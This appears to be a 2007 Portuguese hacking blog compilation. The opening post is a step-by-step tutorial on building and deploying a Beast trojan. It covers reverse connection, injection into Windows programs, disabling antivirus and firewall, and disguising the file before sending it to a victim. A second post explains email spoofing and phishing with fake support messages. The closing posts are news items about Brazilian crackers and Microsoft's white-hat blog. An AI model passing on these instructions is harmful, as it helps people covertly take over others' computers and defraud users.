Ao contrário do Netbus, este programa, além de possuir muito mais funções, oferece a possibilidade de se criar um trojan servidor.

O primeiro passo, após abrí-lo, será criar este trojan, clique em Build Server. Você definirá primeiro o tipo de conexão, se é direta ou reversa. A conexão reversa é a melhor, pois não será necessário saber o IP da vítima. Vamos conhecer como funcionam os dois tipos de conexão:

Conexão Reversa

Esta é sem dúvida a melhor. Consiste em fazer o computador alvo se conectar ao seu, e não vice-versa. É muito útil quando o alvo se trata de um micro interligado em rede intranet. Os micros que fazem parte de uma rede geralmente recebem endereços IP como 192.168.x.x, o que torna impossível conectá-los diretamente.

Para criar o trojan para conexão reversa, siga os seguintes passos

1º) Abra o Beast e clique em Build Server. Será exibida esta tela:

2º) Selecione Reverse Conection. Você terá a opção de injetar no Internet Explorer, no Explorer, ou em qualquer outro programa do Windows. Assim, cada vez que o programa for aberto, o trojan servidor também será iniciado. Ou você pode ainda escolher a opção de não injetar em nenhum programa.

3º) No lado esquerdo, escolha Notifications.

Clique em Get IP e o IP do seu micro irá aparecer. Este IP será utilizado para o computador da vítima se conectar ao seu

Observação: se o seu micro estiver em uma rede privada, você não poderá utilizar o método de conexão reversa. Só será possível invadir via conexão direta micros que não estejam também em rede.

Clicando em E-Mail, você poderá colocar o seu e-mail para receber informações do PC invadido (pôr padrão o servidor de SMTP vem configurado para o yahoo, portanto você precisará de uma conta no yahoo, a não ser que você troque o endereço SMTP). Ainda tem a possibilidade de colocar o seu ICQ, caso possua, para receber informações em tempo real

4º) Agora clique em AV-FW Kill

5º) Por fim você pode escolher o ícone para o seu trojan, clicando em Exe Icon.
Terminado, clique em Save Server para criar o trojan e feche a janela.

Após enviá-lo para a vítima, com o Beast aberto, clique em Start Listening [SIN]. Quando a vítima executá-lo, deverá aparecer uma mensagem, próxima ao relógio, dizendo que há uma nova vítima encontrada. Agora basta clicar duas vezes no micro a ser invadido e pronto (o IP do micro deverá aparecer junto com o nome). A partir de agora, você terá uma infinidade de opções, tudo vai depender dos seus objetivos

Font: kenowledge.net

O que é fake email?

2007-10-14T14:27:00.000-07:00

É uma tecnica de enviar e-mail "falsos", como se fose qualquer pessoa.

Geralmente, um servidor de envio de e-mails de um provedor (o SMTP) faz algumas checagens quando se pede para enviar um e-mail. Checa se aquele endereço realmente pertence ao provedor, se a pessoa que está mandando a mensagem está conectada ali (é raro servidores de envio de e-mail suportarem relay, que é permitir que pessoas de fora do provedor consigam mandar mensagens). Mas existem os servidores que permitem, e até páginas na internet que permite a você fazer isso. Qual o perigo disso? Bom, dizem que uma imagem vale mais que mil palavras... observe a imagem abaixo:

Utilizando como teste um site de e-mails anônimos (fake mails), eu enviei uma mensagem para meu e-mail, como se viesse de president at whitehouse.gov, com o nome de George W. Bush. Muita gente pode pensar: ah, mas isso é como mandar um cartão, você coloca o e-mail que quiser... não é bem assim... a mensagem vai chegar como se fosse enviada normalmente, pelo outlook por exemplo. Vamos observar o e-mail depois que ele chegou na minha caixa postal.

O e-mail chegou, e o nome pelo menos é o que colocamos. Mas e qual é o endereço do e-mail enviado? Vamos dar uma olhada em propriedades.

Prontinho. Objetivo completado. Acabei de “receber” um e-mail do presidente dos Estados Unidos. Agora imagine o impacto do fake mail em empresas e negócios em geral. É muito comum a engenharia social ser usada nesse aspecto. Manda-se um e-mail a vários usuários de um provedor como se fosse do suporte (geralmente suporte at provedor.com.br) com uma mensagem muito convincente, pedindo-os para mudar sua senha de acesso para uma senha padrão, como : abc1234. Claro que muitos não cairão... mas a grande maioria vai cair.

Como evitar esse problema? Com bom senso... se receber um e-mail pedindo alguma coisa importante, responda e confirme se aquele e-mail foi realmente enviado pelo seu dono. Precaução nunca é demais no perigoso jogo da Internet

Font: invasao.com.br

Sete dos dez crackers mais ativos são do Brasil

2007-10-14T08:25:00.000-07:00

Muito interessante essa matéria que a BBC Brasil publicou:

O Brasil continua no topo da lista dos grupos crackers em todo o mundo. De acordo com pesquisa desenvolvida pela mi2g Intelligence Unit, empresa de consultoria de risco digital baseada em Londres, entre os dez grupos que mais invadiram sites durante o mês de outubro, sete estão baseados no Brasil. Nos últimos dois anos, o Brasil vem figurando com destaque na lista dos crackers que incluem desde pessoas que invadem pequenos sites, até os que conseguem fraudar cartões de créditos ou sistemas de governos. De acordo com a mi2g, só neste ano a ação dos crackers já causou prejuízos entre US$ 118,8 bilhões e US$ 145,1 bilhões (entre R$ 336 bilhões e R$ 413 bilhões) em todo o mundo. A ação dos crackers em 2003 aumentou em relação ao ano passado, quando os brasileiros lideraram também o topo da lista.

Prejuizos

Os prejuízos no mercado mundial giraram entre US$ 44 bilhões e US$ 54 bilhões (entre R$ 125 bilhões e R$ 154 bilhões) no ano passado. Os dados divulgados pela mi2g são baseados no sistema Eveda, que estima danos e perdas econômicas de empresas, levando em consideração produtividade e tempo perdidos, além de custos de reparação dos sistemas atingidos. A pesquisa conta o número de sistemas atacados, sem considerar o impacto que causaram. Essa forma de análise é contestada por alguns especialistas que acreditam que a amostragem quantitativa acaba distorcendo a realidade.

Na opinião de Rinaldo Ribeiro, de 28 anos, gerente de tecnologia da empresa carioca 3 elos, é um exagero dizer que o Brasil está no topo do ranking dos crackers. "Certamente é um exagero, porque eles fazem coisas menos criminosas e menos poderosas. Eu não considero esses índices. Na verdade são páginas que são modificadas, para poder medir se um país ou um grupo tem conhecimento, principalmente sobre essa questão de segurança", disse Ribeiro.

A discussão veio à tona depois que o jornal norte-americano The New York Times publicou matéria há cerca de duas semanas dizendo que o Brasil estava se tornando um laboratório de crimes de informática, baseado em um dos relatórios da mi2g.

O último relatório divulgado pela empresa, relativo ao mês de outubro, confirma a liderança do Brasil na lista dos grupos que mais causam danos à rede mundial de Internet, como divulgou o jornal. O consultor acha que quantidade é bem diferente de qualidade e que o Brasil fica atrás de muitos países quando se fala em poder dos crackers.

"Pelos índices genéricos apresentados não dá para medir o que acontece realmente. Se for comparar com o poder, pela capacidade encontrada em outros países como a Polônia ou a China, o Brasil está longe desse topo. Acho que a forma como esta informação é disseminada acaba criando uma imagem distorcida do que acontecesse na realidade", disse Ribeiro. Ele reconhece, no entanto, que os grupos brasileiros realizam "um grande volume de ataques".

O consultor, que já foi chamado de o maior cracker do mundo por ter conseguido por quatro anos ganhar um concurso de quebra de sistemas nos Estados Unidos, acha que esse grande número de ataques revela a fragilidade dos sistemas. "A quantidade de problemas que aparecem todos os dias é enorme, tal como a quantidade de ferramentas que surgem a toda hora. Manter o sistema de rede de segurança em um bom nível é complicado. Existe hoje uma dificuldade de se chegar a um nível de segurança e manter isso".

Conhecimento

Rinaldo Ribeiro lembra ainda que os grandes casos, ao contrário dos que aparecem nos relatórios de empresas de consultoria, não chegam ao conhecimento do público. "A grande maioria dos ataques, as coisas mais sérias, não está disponível para a mídia. (Quando) um grupo russo entra em uma grande empresa de tecnologia nos Estados Unidos isso não sai nos jornais. Falhas muito sérias não são trazidas a público. Então, pode ficar parecendo para quem lê jornal: no Brasil está cheio de criminosos, lançando ataques todos os dias".

Importantes ou não, os ataques dos crackers brasileiros já estão deixando uma marca negativa para o país. Rinaldo Ribeiro disse que alguns sites internacionais já estão bloqueando seus acessos aos internautas brasileiros temendo ataques. O do governo norte-americano é um deles.

Font: www.invasao.com.br

:::: Microsoft cria blog para apresentar seus hackers ::::

2007-10-13T14:49:00.000-07:00

Segundo noticiou o site BetaNews, a novidade será utilizada para apresentar os chamados hackers "white hat", ou seja, aqueles que usam seus conhecimentos para o bem, tornando softwares e sistemas mais seguros.

O site Ars Technica, que noticiou o novo blog no fim de semana, informou que os visitantes não devem esperar receber suporte dos hackers que escrevem por ali.
A idéia é, além de apresentar os hackers, seguindo o tradicional uso de pseudônimos, mostrar o que eles fazem pelos produtos da companhia. Em um post inicial, o participante techjunkie definiu o hacker de verdade como uma pessoa curiosa e que deseja aprender como sistemas funcionam. "Isto pode e é claro que é feito na Microsoft, de uma maneira ética e legal", concluiu.

Buscando informações a respeito do primeiro hacker a publicar um texto no "hackers @ microsoft", o Ars Technica descobriu que techjunkie é o canadense Ahmad Mahdi, um tecnólogo de segurança que começou a trabalhar em tempo integral na Microsoft em agosto de 2005, após dois anos de prestação de serviços.

Mais informações e alguns dos outros hackers empregados pela Microsoft devem aparecer nas próximas semanas no endereço blogs.msdn.com/hackers.

font invasao.com.br